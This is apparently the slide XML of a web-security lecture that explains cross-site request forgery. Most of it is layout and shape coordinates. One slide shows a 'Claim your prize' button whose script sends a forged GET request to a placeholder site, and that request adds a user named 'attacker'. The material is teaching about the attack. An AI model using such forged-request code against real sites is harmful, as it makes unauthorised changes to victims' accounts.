              <a:rPr spc="-20" dirty="0"/>
              <a:t>example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>(Step </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>2 of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="110" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643377" y="1309116"/>
            <a:ext cx="5297423" cy="22098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915416" y="3481832"/>
            <a:ext cx="7937500" cy="2988310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15"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-7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type=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> "button"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-6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value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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="Claim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your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prize"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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onclick="</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>foo()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="182880" marR="6283960" indent="-170815">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;script&gt;  function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(){</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291465">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>var http </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>= new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-19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XMLHttpRequest();</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="291465">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>var 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url </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>"ht</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>p://www.xyz.com/users.php </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>?x=0&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>action=add </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15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name=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attacker</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>...";</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="298450" marR="4872355" indent="-635">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>http.open(“GET", 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url </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-8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true);  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>http.send(null);</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="184150">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="215"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="219"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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947159" y="2995802"/>
            <a:ext cx="2733040" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2733040">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2732532" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38862">
            <a:solidFill>
              <a:srgbClr val="C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612635" y="3001517"/>
            <a:ext cx="132715" cy="518159"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="51981" y="436677"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28956" y="397002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25146" y="390144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16002" y="387858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="403860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4572" y="410718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="492957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51981" y="436677"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="66387" y="461498"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="51981" y="436677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="482345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66387" y="461498"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="132588" y="404622"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="130302" y="395478"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124206" y="391668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="117348" y="387858"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108204" y="390144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104394" y="397002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80937" y="436807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80772" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51816" y="492957"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66294" y="518159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128778" y="411480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="132588" y="404622"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="82296" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="53340" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51981" y="436677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66387" y="461498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80937" y="436807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82296" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="78486" y="482345"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66387" y="461498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="482345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="482345"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="78486" y="489966"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="78486" y="482345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="482345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54102" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="489966"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="132715" h="518160">
                <a:moveTo>
                  <a:pt x="80937" y="436807"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="66387" y="461498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="482345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78486" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80772" y="489966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80937" y="436807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36</a:t>
            </a:fld>
            <a:endParaRPr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16861" y="645668"/>
            <a:ext cx="585025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A CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>example </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>(Step </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>3 of</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="110" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2424683" y="1409700"/>
            <a:ext cx="4838700" cy="22098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128772" y="3399282"/>
            <a:ext cx="3448050" cy="103784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451102" y="5050790"/>
            <a:ext cx="570674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10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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5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new</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-6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just</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-130" dirty="0"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C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>added</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-14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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75" dirty="0"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C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-75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attack</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>types: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-295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C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>stored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37</a:t>
            </a:fld>
            <a:endParaRPr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959861" y="645668"/>
            <a:ext cx="459740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Stored </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-25" dirty="0"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>example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167638" y="5709158"/>
            <a:ext cx="7682230" cy="894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100"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="94736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900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5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resides</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-40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in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-65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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-95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1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>website</a:t>
            </a:r>
            <a:endParaRPr sz="19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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="195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SzPct val="94736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900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>more</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-105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1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-75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1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-80" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="190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CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-50" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45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than</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-45" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>attacks</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constanti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088136" y="1319783"/>
            <a:ext cx="5257800" cy="41300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617214" y="2796539"/>
            <a:ext cx="2451100" cy="303530"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="12700" y="183642"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12699" y="120396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="127254"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12700" y="183642"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2451100" h="303530">
                <a:moveTo>
                  <a:pt x="2425700" y="148589"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2425700" y="118871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2413000" y="111251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2336800" y="83380"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2286000" y="71755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2235200" y="62211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2184400" y="54296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2133600" y="47559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2082800" y="41548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2044700" y="35813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1993900" y="32003"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955800" y="27431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1905000" y="23494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1854200" y="19934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1803400" y="16733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1752600" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1701800" y="11327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1651000" y="9082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1600200" y="7115"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1549400" y="5407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1498600" y="3937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447800" y="2687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1397000" y="1635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346200" y="761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1282700" y="761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1219200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1155700" y="761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1092200" y="761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1041400" y="1636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="990600" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="952500" y="3943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901700" y="5415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="850900" y="7126"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="800100" y="9096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="749300" y="11343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698500" y="13888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647700" y="16749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="596900" y="19947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546100" y="23502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495300" y="27432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444500" y="32004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406400" y="35814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355600" y="41600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="47631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254000" y="54365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="62263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152400" y="71784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101600" y="83388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63500" y="97536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38099" y="104394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25399" y="112014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12699" y="118872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12700" y="184404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="192024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25400" y="143256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="136398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114300" y="110527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165100" y="99248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215900" y="89966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266700" y="82279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304800" y="75785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="355600" y="70083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="406400" y="64770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="457200" y="60198"/>
                </a:lnTo>
